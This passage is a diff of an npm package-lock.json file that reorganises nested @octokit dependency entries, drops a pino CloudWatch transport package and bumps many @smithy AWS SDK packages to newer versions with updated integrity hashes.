"10.0.0", "resolved": "https://registry.npmjs.org/@octokit/types/-/types-10.0.0.tgz", @@ -8259,54 +8311,39 @@ "node": ">= 18" } }, - "node_modules/@octokit/request-error": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", - "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "node_modules/@octokit/request/node_modules/@octokit/endpoint": { + "version": "9.0.6", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-9.0.6.tgz", + "integrity": "sha512-H1fNTMA57HbkFESSt3Y9+FBICv+0jFceJFPWDePYlR/iMGrwM5ph+Dd4XRQs+8X+PUFURLQgX9ChPfhJ/1uNQw==", "license": "MIT", "dependencies": { "@octokit/types": "^13.1.0", - "deprecation": "^2.0.0", - "once": "^1.4.0" + "universal-user-agent": "^6.0.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { + "node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "24.2.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", 
"integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", "license": "MIT" }, - "node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "13.10.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", - "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^24.2.0" - } - }, - "node_modules/@octokit/request/node_modules/@octokit/endpoint": { - "version": "9.0.6", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-9.0.6.tgz", - "integrity": "sha512-H1fNTMA57HbkFESSt3Y9+FBICv+0jFceJFPWDePYlR/iMGrwM5ph+Dd4XRQs+8X+PUFURLQgX9ChPfhJ/1uNQw==", + "node_modules/@octokit/request/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { "@octokit/types": "^13.1.0", - "universal-user-agent": "^6.0.0" + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/request/node_modules/@octokit/openapi-types": { - "version": "24.2.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", - "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", - "license": "MIT" - }, "node_modules/@octokit/request/node_modules/@octokit/types": { "version": "13.10.0", "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", @@ -8372,6 +8409,35 @@ "resolved": "https://registry.npmjs.org/@octokit/webhooks-types/-/webhooks-types-7.3.1.tgz", "integrity": "sha512-u6355ZsZnHwmxen30SrqnYb1pXieBFkYgkNzt+Ed4Ao5tupN1OErHfzwiV6hq6duGkDAYASbq7/uVJQ69PjLEg==" }, 
+ "node_modules/@octokit/webhooks/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/webhooks/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/@octokit/webhooks/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/@octokit/webhooks/node_modules/@octokit/webhooks-types": { "version": "7.1.0", "resolved": "https://registry.npmjs.org/@octokit/webhooks-types/-/webhooks-types-7.1.0.tgz", @@ -10330,28 +10396,6 @@ "node": ">=8" } }, - "node_modules/@serdnam/pino-cloudwatch-transport": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@serdnam/pino-cloudwatch-transport/-/pino-cloudwatch-transport-1.0.4.tgz", - "integrity": "sha512-0wtILlFlO/qTFANM1oEMZLKa9REo+mluHN0VTDaOMh15H9Puc+qU4z4jAoZqggFz9Fw9EGG4c+UHpMduZ1EzeQ==", - "dependencies": { - "@aws-sdk/client-cloudwatch-logs": "^3.52.0", - "p-throttle": "^5.0.0", - "pino-abstract-transport": "^0.5.0" - }, - "engines": { - "node": ">=16.0.0" - } - }, - "node_modules/@serdnam/pino-cloudwatch-transport/node_modules/pino-abstract-transport": { - "version": "0.5.0", 
- "resolved": "https://registry.npmjs.org/pino-abstract-transport/-/pino-abstract-transport-0.5.0.tgz", - "integrity": "sha512-+KAgmVeqXYbTtU2FScx1XS3kNyfZ5TrXY07V96QnUSFqo2gAqlvmaxH67Lj7SWazqsMabf+58ctdTcBgnOLUOQ==", - "dependencies": { - "duplexify": "^4.1.2", - "split2": "^4.0.0" - } - }, "node_modules/@simplewebauthn/server": { "version": "13.2.2", "resolved": "https://registry.npmjs.org/@simplewebauthn/server/-/server-13.2.2.tgz", @@ -10500,16 +10544,16 @@ } }, "node_modules/@smithy/config-resolver": { - "version": "4.4.13", - "resolved": "https://registry.npmjs.org/@smithy/config-resolver/-/config-resolver-4.4.13.tgz", - "integrity": "sha512-iIzMC5NmOUP6WL6o8iPBjFhUhBZ9pPjpUpQYWMUFQqKyXXzOftbfK8zcQCz/jFV1Psmf05BK5ypx4K2r4Tnwdg==", + "version": "4.4.17", + "resolved": "https://registry.npmjs.org/@smithy/config-resolver/-/config-resolver-4.4.17.tgz", + "integrity": "sha512-TzDZcAnhTyAHbXVxWZo7/tEcrIeFq20IBk8So3OLOetWpR8EwY/yEqBMBFaJMeyEiREDq4NfEl+qO3OAUD+vbQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", - "@smithy/util-endpoints": "^3.3.3", - "@smithy/util-middleware": "^4.2.12", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", "tslib": "^2.6.2" }, "engines": { @@ -10517,18 +10561,18 @@ } }, "node_modules/@smithy/core": { - "version": "3.23.13", - "resolved": "https://registry.npmjs.org/@smithy/core/-/core-3.23.13.tgz", - "integrity": "sha512-J+2TT9D6oGsUVXVEMvz8h2EmdVnkBiy2auCie4aSJMvKlzUtO5hqjEzXhoCUkIMo7gAYjbQcN0g/MMSXEhDs1Q==", + "version": "3.23.17", + "resolved": "https://registry.npmjs.org/@smithy/core/-/core-3.23.17.tgz", + "integrity": "sha512-x7BlLbUFL8NWCGjMF9C+1N5cVCxcPa7g6Tv9B4A2luWx3be3oU8hQ96wIwxe/s7OhIzvoJH73HAUSg5JXVlEtQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": 
"^4.13.1", - "@smithy/url-parser": "^4.2.12", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-stream": "^4.5.21", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-stream": "^4.5.25", "@smithy/util-utf8": "^4.2.2", "@smithy/uuid": "^1.1.2", "tslib": "^2.6.2" @@ -10538,15 +10582,15 @@ } }, "node_modules/@smithy/credential-provider-imds": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/credential-provider-imds/-/credential-provider-imds-4.2.12.tgz", - "integrity": "sha512-cr2lR792vNZcYMriSIj+Um3x9KWrjcu98kn234xA6reOAFMmbRpQMOv8KPgEmLLtx3eldU6c5wALKFqNOhugmg==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/credential-provider-imds/-/credential-provider-imds-4.2.14.tgz", + "integrity": "sha512-Au28zBN48ZAoXdooGUHemuVBrkE+Ie6RPmGNIAJsFqj33Vhb6xAgRifUydZ2aY+M+KaMAETAlKk5NC5h1G7wpg==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "tslib": "^2.6.2" }, "engines": { @@ -10624,14 +10668,14 @@ } }, "node_modules/@smithy/fetch-http-handler": { - "version": "5.3.15", - "resolved": "https://registry.npmjs.org/@smithy/fetch-http-handler/-/fetch-http-handler-5.3.15.tgz", - "integrity": "sha512-T4jFU5N/yiIfrtrsb9uOQn7RdELdM/7HbyLNr6uO/mpkj1ctiVs7CihVr51w4LyQlXWDpXFn4BElf1WmQvZu/A==", + "version": "5.3.17", + "resolved": "https://registry.npmjs.org/@smithy/fetch-http-handler/-/fetch-http-handler-5.3.17.tgz", + "integrity": "sha512-bXOvQzaSm6MnmLaWA1elgfQcAtN4UP3vXqV97bHuoOrHQOJiLT3ds6o9eo5bqd0TJfRFpzdGnDQdW3FACiAVdw==", "license": 
"Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/querystring-builder": "^4.2.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/querystring-builder": "^4.2.14", + "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", "tslib": "^2.6.2" }, @@ -10655,12 +10699,12 @@ } }, "node_modules/@smithy/hash-node": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/hash-node/-/hash-node-4.2.12.tgz", - "integrity": "sha512-QhBYbGrbxTkZ43QoTPrK72DoYviDeg6YKDrHTMJbbC+A0sml3kSjzFtXP7BtbyJnXojLfTQldGdUR0RGD8dA3w==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/hash-node/-/hash-node-4.2.14.tgz", + "integrity": "sha512-8ZBDY2DD4wr+GGjTpPtiglEsqr0lUP+KHqgZcWczFf6qeZ/YRjMIOoQWVQlmwu7EtxKTd8YXD8lblmYcpBIA1g==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "@smithy/util-buffer-from": "^4.2.2", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" @@ -10684,12 +10728,12 @@ } }, "node_modules/@smithy/invalid-dependency": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/invalid-dependency/-/invalid-dependency-4.2.12.tgz", - "integrity": "sha512-/4F1zb7Z8LOu1PalTdESFHR0RbPwHd3FcaG1sI3UEIriQTWakysgJr65lc1jj6QY5ye7aFsisajotH6UhWfm/g==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/invalid-dependency/-/invalid-dependency-4.2.14.tgz", + "integrity": "sha512-c21qJiTSb25xvvOp+H2TNZzPCngrvl5vIPqPB8zQ/DmJF4QWXO19x1dWfMJZ6wZuuWUPPm0gV8C0cU3+ifcWuw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10723,13 +10767,13 @@ } }, "node_modules/@smithy/middleware-content-length": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/middleware-content-length/-/middleware-content-length-4.2.12.tgz", - "integrity": 
"sha512-YE58Yz+cvFInWI/wOTrB+DbvUVz/pLn5mC5MvOV4fdRUc6qGwygyngcucRQjAhiCEbmfLOXX0gntSIcgMvAjmA==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/middleware-content-length/-/middleware-content-length-4.2.14.tgz", + "integrity": "sha512-xhHq7fX4/3lv5NHxLUk3OeEvl0xZ+Ek3qIbWaCL4f9JwgDZEclPBElljaZCAItdGPQl/kSM4LPMOpy1MYgprpw==", "license": "Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10737,18 +10781,18 @@ } }, "node_modules/@smithy/middleware-endpoint": { - "version": "4.4.28", - "resolved": "https://registry.npmjs.org/@smithy/middleware-endpoint/-/middleware-endpoint-4.4.28.tgz", - "integrity": "sha512-p1gfYpi91CHcs5cBq982UlGlDrxoYUX6XdHSo91cQ2KFuz6QloHosO7Jc60pJiVmkWrKOV8kFYlGFFbQ2WUKKQ==", + "version": "4.4.32", + "resolved": "https://registry.npmjs.org/@smithy/middleware-endpoint/-/middleware-endpoint-4.4.32.tgz", + "integrity": "sha512-ZZkgyjnJppiZbIm6Qbx92pbXYi1uzenIvGhBSCDlc7NwuAkiqSgS75j1czAD25ZLs2FjMjYy1q7gyRVWG6JA0Q==", "license": "Apache-2.0", "dependencies": { - "@smithy/core": "^3.23.13", - "@smithy/middleware-serde": "^4.2.16", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", - "@smithy/util-middleware": "^4.2.12", + "@smithy/core": "^3.23.17", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-middleware": "^4.2.14", "tslib": "^2.6.2" }, "engines": { @@ -10756,18 +10800,19 @@ } }, "node_modules/@smithy/middleware-retry": { - "version": "4.4.46", - "resolved": "https://registry.npmjs.org/@smithy/middleware-retry/-/middleware-retry-4.4.46.tgz", - "integrity": 
"sha512-SpvWNNOPOrKQGUqZbEPO+es+FRXMWvIyzUKUOYdDgdlA6BdZj/R58p4umoQ76c2oJC44PiM7mKizyyex1IJzow==", + "version": "4.5.6", + "resolved": "https://registry.npmjs.org/@smithy/middleware-retry/-/middleware-retry-4.5.6.tgz", + "integrity": "sha512-5zhmo2AkstmM/RMKYP0NHfmuYWBR+/umlmSuALgajLxf0X0rLE6d17MfzTxpzkILWVhwvCJkCyPH0AfMlbaucQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/service-error-classification": "^4.2.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-retry": "^4.2.13", + "@smithy/core": "^3.23.17", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/service-error-classification": "^4.3.1", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.5", "@smithy/uuid": "^1.1.2", "tslib": "^2.6.2" }, @@ -10776,14 +10821,14 @@ } }, "node_modules/@smithy/middleware-serde": { - "version": "4.2.16", - "resolved": "https://registry.npmjs.org/@smithy/middleware-serde/-/middleware-serde-4.2.16.tgz", - "integrity": "sha512-beqfV+RZ9RSv+sQqor3xroUUYgRFCGRw6niGstPG8zO9LgTl0B0MCucxjmrH/2WwksQN7UUgI7KNANoZv+KALA==", + "version": "4.2.20", + "resolved": "https://registry.npmjs.org/@smithy/middleware-serde/-/middleware-serde-4.2.20.tgz", + "integrity": "sha512-Lx9JMO9vArPtiChE3wbEZ5akMIDQpWQtlu90lhACQmNOXcGXRbaDywMHDzuDZ2OkZzP+9wQfZi3YJT9F67zTQQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/core": "^3.23.13", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/core": "^3.23.17", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10791,12 +10836,12 @@ } }, "node_modules/@smithy/middleware-stack": { - "version": "4.2.12", - "resolved": 
"https://registry.npmjs.org/@smithy/middleware-stack/-/middleware-stack-4.2.12.tgz", - "integrity": "sha512-kruC5gRHwsCOuyCd4ouQxYjgRAym2uDlCvQ5acuMtRrcdfg7mFBg6blaxcJ09STpt3ziEkis6bhg1uwrWU7txw==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/middleware-stack/-/middleware-stack-4.2.14.tgz", + "integrity": "sha512-2dvkUKLuFdKsCRmOE4Mn63co0Djtsm+JMh0bYZQupN1pJwMeE8FmQmRLLzzEMN0dnNi7CDCYYH8F0EVwWiPBeA==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10804,14 +10849,14 @@ } }, "node_modules/@smithy/node-config-provider": { - "version": "4.3.12", - "resolved": "https://registry.npmjs.org/@smithy/node-config-provider/-/node-config-provider-4.3.12.tgz", - "integrity": "sha512-tr2oKX2xMcO+rBOjobSwVAkV05SIfUKz8iI53rzxEmgW3GOOPOv0UioSDk+J8OpRQnpnhsO3Af6IEBabQBVmiw==", + "version": "4.3.14", + "resolved": "https://registry.npmjs.org/@smithy/node-config-provider/-/node-config-provider-4.3.14.tgz", + "integrity": "sha512-S+gFjyo/weSVL0P1b9Ts8C/CwIfNCgUPikk3sl6QVsfE/uUuO+QsF+NsE/JkpvWqqyz1wg7HFdiaZuj5CoBMRg==", "license": "Apache-2.0", "dependencies": { - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10819,14 +10864,14 @@ } }, "node_modules/@smithy/node-http-handler": { - "version": "4.5.1", - "resolved": "https://registry.npmjs.org/@smithy/node-http-handler/-/node-http-handler-4.5.1.tgz", - "integrity": "sha512-ejjxdAXjkPIs9lyYyVutOGNOraqUE9v/NjGMKwwFrfOM354wfSD8lmlj8hVwUzQmlLLF4+udhfCX9Exnbmvfzw==", + "version": "4.6.1", + "resolved": "https://registry.npmjs.org/@smithy/node-http-handler/-/node-http-handler-4.6.1.tgz", + "integrity": "sha512-iB+orM4x3xrr57X3YaXazfKnntl0LHlZB1kcXSGzMV1Tt0+YwEjGlbjk/44qEGtBzXAz6yFDzkYTKSV6Pj2HUg==", 
"license": "Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/querystring-builder": "^4.2.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/querystring-builder": "^4.2.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10834,12 +10879,12 @@ } }, "node_modules/@smithy/property-provider": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/property-provider/-/property-provider-4.2.12.tgz", - "integrity": "sha512-jqve46eYU1v7pZ5BM+fmkbq3DerkSluPr5EhvOcHxygxzD05ByDRppRwRPPpFrsFo5yDtCYLKu+kreHKVrvc7A==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/property-provider/-/property-provider-4.2.14.tgz", + "integrity": "sha512-WuM31CgfsnQ/10i7NYr0PyxqknD72Y5uMfUMVSniPjbEPceiTErb4eIqJQ+pdxNEAUEWrewrGjIRjVbVHsxZiQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10847,12 +10892,12 @@ } }, "node_modules/@smithy/protocol-http": { - "version": "5.3.12", - "resolved": "https://registry.npmjs.org/@smithy/protocol-http/-/protocol-http-5.3.12.tgz", - "integrity": "sha512-fit0GZK9I1xoRlR4jXmbLhoN0OdEpa96ul8M65XdmXnxXkuMxM0Y8HDT0Fh0Xb4I85MBvBClOzgSrV1X2s1Hxw==", + "version": "5.3.14", + "resolved": "https://registry.npmjs.org/@smithy/protocol-http/-/protocol-http-5.3.14.tgz", + "integrity": "sha512-dN5F8kHx8RNU0r+pCwNmFZyz6ChjMkzShy/zup6MtkRmmix4vZzJdW+di7x//b1LiynIev88FM18ie+wwPcQtQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10860,12 +10905,12 @@ } }, "node_modules/@smithy/querystring-builder": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/querystring-builder/-/querystring-builder-4.2.12.tgz", - "integrity": "sha512-6wTZjGABQufekycfDGMEB84BgtdOE/rCVTov+EDXQ8NHKTUNIp/j27IliwP7tjIU9LR+sSzyGBOXjeEtVgzCHg==", + "version": "4.2.14", 
+ "resolved": "https://registry.npmjs.org/@smithy/querystring-builder/-/querystring-builder-4.2.14.tgz", + "integrity": "sha512-XYA5Z0IqTeF+5XDdh4BBmSA0HvbgVZIyv4cmOoUheDNR57K1HgBp9ukUMx3Cr3XpDHHpLBnexPE3LAtDsZkj2A==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "@smithy/util-uri-escape": "^4.2.2", "tslib": "^2.6.2" }, @@ -10874,12 +10919,12 @@ } }, "node_modules/@smithy/querystring-parser": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/querystring-parser/-/querystring-parser-4.2.12.tgz", - "integrity": "sha512-P2OdvrgiAKpkPNKlKUtWbNZKB1XjPxM086NeVhK+W+wI46pIKdWBe5QyXvhUm3MEcyS/rkLvY8rZzyUdmyDZBw==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/querystring-parser/-/querystring-parser-4.2.14.tgz", + "integrity": "sha512-hr+YyqBD23GVvRxGGrcc/oOeNlK3PzT5Fu4dzrDXxzS1LpFiuL2PQQqKPs87M79aW7ziMs+nvB3qdw77SqE7Lw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10887,24 +10932,24 @@ } }, "node_modules/@smithy/service-error-classification": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/service-error-classification/-/service-error-classification-4.2.12.tgz", - "integrity": "sha512-LlP29oSQN0Tw0b6D0Xo6BIikBswuIiGYbRACy5ujw/JgWSzTdYj46U83ssf6Ux0GyNJVivs2uReU8pt7Eu9okQ==", + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/@smithy/service-error-classification/-/service-error-classification-4.3.1.tgz", + "integrity": "sha512-aUQuDGh760ts/8MU+APjIZhlLPKhIIfqyzZaJikLEIMrdxFvxuLYD0WxWzaYWpmLbQlXDe9p7EWM3HsBe0K6Gw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1" + "@smithy/types": "^4.14.1" }, "engines": { "node": ">=18.0.0" } }, "node_modules/@smithy/shared-ini-file-loader": { - "version": "4.4.7", - "resolved": "https://registry.npmjs.org/@smithy/shared-ini-file-loader/-/shared-ini-file-loader-4.4.7.tgz", 
- "integrity": "sha512-HrOKWsUb+otTeo1HxVWeEb99t5ER1XrBi/xka2Wv6NVmTbuCUC1dvlrksdvxFtODLBjsC+PHK+fuy2x/7Ynyiw==", + "version": "4.4.9", + "resolved": "https://registry.npmjs.org/@smithy/shared-ini-file-loader/-/shared-ini-file-loader-4.4.9.tgz", + "integrity": "sha512-495/V2I15SHgedSJoDPD23JuSfKAp726ZI1V0wtjB07Wh7q/0tri/0e0DLefZCHgxZonrGKt/OCTpAtP1wE1kQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10912,16 +10957,16 @@ } }, "node_modules/@smithy/signature-v4": { - "version": "5.3.12", - "resolved": "https://registry.npmjs.org/@smithy/signature-v4/-/signature-v4-5.3.12.tgz", - "integrity": "sha512-B/FBwO3MVOL00DaRSXfXfa/TRXRheagt/q5A2NM13u7q+sHS59EOVGQNfG7DkmVtdQm5m3vOosoKAXSqn/OEgw==", + "version": "5.3.14", + "resolved": "https://registry.npmjs.org/@smithy/signature-v4/-/signature-v4-5.3.14.tgz", + "integrity": "sha512-1D9Y/nmlVjCeSivCbhZ7hgEpmHyY1h0GvpSZt3l0xcD9JjmjVC1CHOozS6+Gh+/ldMH8JuJ6cujObQqfayAVFA==", "license": "Apache-2.0", "dependencies": { "@smithy/is-array-buffer": "^4.2.2", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "@smithy/util-hex-encoding": "^4.2.2", - "@smithy/util-middleware": "^4.2.12", + "@smithy/util-middleware": "^4.2.14", "@smithy/util-uri-escape": "^4.2.2", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" @@ -10931,17 +10976,17 @@ } }, "node_modules/@smithy/smithy-client": { - "version": "4.12.8", - "resolved": "https://registry.npmjs.org/@smithy/smithy-client/-/smithy-client-4.12.8.tgz", - "integrity": "sha512-aJaAX7vHe5i66smoSSID7t4rKY08PbD8EBU7DOloixvhOozfYWdcSYE4l6/tjkZ0vBZhGjheWzB2mh31sLgCMA==", + "version": "4.12.13", + "resolved": "https://registry.npmjs.org/@smithy/smithy-client/-/smithy-client-4.12.13.tgz", + "integrity": "sha512-y/Pcj1V9+qG98gyu1gvftHB7rDpdh+7kIBIggs55yGm3JdtBV8GT8IFF3a1qxZ79QnaJHX9GXzvBG6tAd+czJA==", "license": 
"Apache-2.0", "dependencies": { - "@smithy/core": "^3.23.13", - "@smithy/middleware-endpoint": "^4.4.28", - "@smithy/middleware-stack": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", - "@smithy/util-stream": "^4.5.21", + "@smithy/core": "^3.23.17", + "@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", + "@smithy/util-stream": "^4.5.25", "tslib": "^2.6.2" }, "engines": { @@ -10949,9 +10994,9 @@ } }, "node_modules/@smithy/types": { - "version": "4.13.1", - "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.13.1.tgz", - "integrity": "sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==", + "version": "4.14.1", + "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.14.1.tgz", + "integrity": "sha512-59b5HtSVrVR/eYNei3BUj3DCPKD/G7EtDDe7OEJE7i7FtQFugYo6MxbotS8mVJkLNVf8gYaAlEBwwtJ9HzhWSg==", "license": "Apache-2.0", "dependencies": { "tslib": "^2.6.2" @@ -10961,13 +11006,13 @@ } }, "node_modules/@smithy/url-parser": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/url-parser/-/url-parser-4.2.12.tgz", - "integrity": "sha512-wOPKPEpso+doCZGIlr+e1lVI6+9VAKfL4kZWFgzVgGWY2hZxshNKod4l2LXS3PRC9otH/JRSjtEHqQ/7eLciRA==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/url-parser/-/url-parser-4.2.14.tgz", + "integrity": "sha512-p06BiBigJ8bTA3MgnOfCtDUWnAMY0YfedO/GRpmc7p+wg3KW8vbXy1xwSu5ASy0wV7rRYtlfZOIKH4XqfhjSQQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/querystring-parser": "^4.2.12", - "@smithy/types": "^4.13.1", + "@smithy/querystring-parser": "^4.2.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11038,14 +11083,14 @@ } }, "node_modules/@smithy/util-defaults-mode-browser": { - "version": "4.3.44", - "resolved": 
